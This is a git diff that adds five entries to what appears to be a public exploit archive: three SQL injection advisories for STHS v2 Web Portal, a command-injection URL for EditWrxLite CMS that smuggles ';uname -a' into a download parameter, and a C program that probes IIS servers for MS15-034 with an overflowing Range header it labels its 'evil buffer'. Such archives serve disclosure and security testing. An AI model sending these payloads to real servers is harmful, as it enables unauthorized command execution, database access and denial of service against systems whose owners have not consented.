diff --git a/files.csv b/files.csv index ebcb3190d..398e810d2 100755 --- a/files.csv +++ b/files.csv @@ -33169,3 +33169,8 @@ id,file,description,date,author,platform,type,port 36766,platforms/php/webapps/36766.txt,"Powie pFile 1.02 pfile/file.php id Parameter SQL Injection",2012-02-13,indoushka,php,webapps,0 36767,platforms/hardware/remote/36767.html,"D-Link DAP-1150 1.2.94 Cross Site Request Forgery Vulnerability",2012-02-13,MustLive,hardware,remote,0 36768,platforms/php/webapps/36768.txt,"ProWiki 'id' Parameter Cross Site Scripting Vulnerability",2012-02-10,sonyy,php,webapps,0 +36769,platforms/php/webapps/36769.txt,"STHS v2 Web Portal prospects.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0 +36770,platforms/php/webapps/36770.txt,"STHS v2 Web Portal prospect.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0 +36771,platforms/php/webapps/36771.txt,"STHS v2 Web Portal team.php team Parameter SQL Injection",2012-02-13,"Liyan Oz",php,webapps,0 +36772,platforms/cgi/webapps/36772.txt,"EditWrxLite CMS 'wrx.cgi' Remote Command Execution Vulnerability",2012-02-13,chippy1337,cgi,webapps,0 +36773,platforms/windows/dos/36773.c,"Microsoft Window - HTTP.sys PoC (MS15-034)",2015-04-15,rhcp011235,windows,dos,0 diff --git a/platforms/cgi/webapps/36772.txt b/platforms/cgi/webapps/36772.txt new file mode 100755 index 000000000..71045e21e --- /dev/null +++ b/platforms/cgi/webapps/36772.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/51995/info + +EditWrxLite CMS is prone to a remote command-execution vulnerability. + +Attackers can exploit this issue to execute arbitrary commands with the privileges of the affected application. + +http://www.example.com/editwrx/wrx.cgi?download=;uname%20-a| \ No newline at end of file diff --git a/platforms/php/webapps/36769.txt b/platforms/php/webapps/36769.txt new file mode 100755 index 000000000..9ec66dd05 --- /dev/null +++ b/platforms/php/webapps/36769.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/51991/info + +STHS v2 Web Portal is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +STHS v2 Web Portal 2.2 is vulnerable; other versions may also be affected. + + http://www.example.com/prospects.php?team=[SQLi]' \ No newline at end of file diff --git a/platforms/php/webapps/36770.txt b/platforms/php/webapps/36770.txt new file mode 100755 index 000000000..de2d31fd7 --- /dev/null +++ b/platforms/php/webapps/36770.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/51991/info + +STHS v2 Web Portal is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +STHS v2 Web Portal 2.2 is vulnerable; other versions may also be affected. + +http://www.example.com/prospect.php?team=[SQLi]' \ No newline at end of file diff --git a/platforms/php/webapps/36771.txt b/platforms/php/webapps/36771.txt new file mode 100755 index 000000000..89c127ca3 --- /dev/null +++ b/platforms/php/webapps/36771.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/51991/info + +STHS v2 Web Portal is prone to multiple SQL-injection vulnerabilities because the application fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +STHS v2 Web Portal 2.2 is vulnerable; other versions may also be affected. + +http://www.example.com/team.php?team=[SQLi]' \ No newline at end of file diff --git a/platforms/windows/dos/36773.c b/platforms/windows/dos/36773.c new file mode 100755 index 000000000..2bf910a44 --- /dev/null +++ b/platforms/windows/dos/36773.c @@ -0,0 +1,108 @@ +/* + UNTESTED - MS15-034 Checker + + THE BUG: + + 8a8b2112 56 push esi + 8a8b2113 6a00 push 0 + 8a8b2115 2bc7 sub eax,edi + 8a8b2117 6a01 push 1 + 8a8b2119 1bca sbb ecx,edx + 8a8b211b 51 push ecx + 8a8b211c 50 push eax + 8a8b211d e8bf69fbff call HTTP!RtlULongLongAdd (8a868ae1) ; here + + ORIGNAL POC: http://pastebin.com/raw.php?i=ypURDPc4 + + BY: john.b.hale@gmai.com + Twitter: @rhcp011235 +*/ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +int connect_to_server(char *ip) +{ + int sockfd = 0, n = 0; + + struct sockaddr_in serv_addr; + struct hostent *server; + + if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0) + { + printf("\n Error : Could not create socket \n"); + return 1; + } + + memset(&serv_addr, '0', sizeof(serv_addr)); + serv_addr.sin_family = AF_INET; + serv_addr.sin_port = htons(80); + if(inet_pton(AF_INET, ip, &serv_addr.sin_addr)<=0) + { + printf("\n inet_pton error occured\n"); + return 1; + } + if( connect(sockfd, (struct sockaddr *)&serv_addr, sizeof(serv_addr)) < 0) + { + printf("\n Error : Connect Failed \n"); + return 1; + } + + return sockfd; +} + + +int main(int argc, char *argv[]) +{ + int n = 0; + int sockfd; + char recvBuff[1024]; + + // Check server + char request[] = "GET / HTTP/1.0\r\n\r\n"; + + // our evil buffer + char request1[] = "GET / HTTP/1.1\r\nHost: stuff\r\nRange: bytes=0-18446744073709551615\r\n\r\n"; + + + if(argc != 2) + { + printf("\n Usage: %s \n",argv[0]); + return 1; + } + + printf("[*] Audit Started\n"); + sockfd = connect_to_server(argv[1]); + write(sockfd, request, strlen(request)); + read(sockfd, recvBuff, sizeof(recvBuff)-1); + + if (!strstr(recvBuff,"Microsoft")) + { + printf("[*] NOT IIS\n"); + exit(1); + } + + sockfd = connect_to_server(argv[1]); + write(sockfd, request1, strlen(request1)); + read(sockfd, recvBuff, sizeof(recvBuff)-1); + if (strstr(recvBuff,"Requested Range Not Satisfiable")) + { + printf("[!!] Looks VULN\n"); + exit(1); + } else if(strstr(recvBuff,"The request has an invalid header name")) { + printf("[*] Looks Patched"); +} else + printf("[*] Unexpected response, cannot discern patch status"); + + + + +} \ No newline at end of file